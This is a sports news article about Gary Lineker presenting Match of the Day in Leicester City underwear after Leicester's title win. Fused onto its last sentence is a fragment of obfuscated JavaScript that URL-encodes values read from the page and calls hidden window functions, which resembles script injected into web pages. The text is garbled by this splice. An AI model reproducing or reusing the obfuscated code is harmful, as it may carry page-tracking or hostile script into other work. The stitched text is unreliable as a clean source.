Former England striker Gary Lineker presented the Premier League highlights show in his underwear after promising to do so if his old club won the title last season.

With co-presenters Alan Shearer and Ian Wright having a laugh in the background, a straight-faced Lineker, sporting only a pair of white boxer shorts inscribed with the Leicester City badge, introduced the BBC’s Match of the Day programme of the new Premier League season.

On December 14 last year, the 55-year-old former Leicester City striker vowed he would wear just his pants on national TV if the Foxes, the team he supports, went on to win the league last season. Leicester defied odds of 5000-1 by claiming a shock Premier League title last season, finishing 10 points ahead of their nearest rivals Arsenal.

“It is a one-off and a sporting miracle that has landed me in my underwear,” Lineker told www.bbc.co.uk.

“When I tweeted that silly bet back in December, I categorically knew there was zero chance of Leicester winning the league. Zero chance. It happened but it was magical, it was great,” he added.

The new season did not start on a positive note for Ranieri’s men, as they succumbed to a 2-1 defeat against Hull City on August 13.

Impish Lineker was present in his underwear as Shearer and Wright analysed Leicester’s opening-day defeat, but as the hosts moved on to the second match, he told the viewers: “Enough of this nonsense, I’m going to get dressed”.

Lineker started with Leicester, and went on to score 95 goals in 187 league starts between 1978 and 1985, before leaving his first club for stints at Everton, Barcelona and Tottenham Hotspur. The prolific marksman also netted 48 times in 80 appearances for England. _0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}
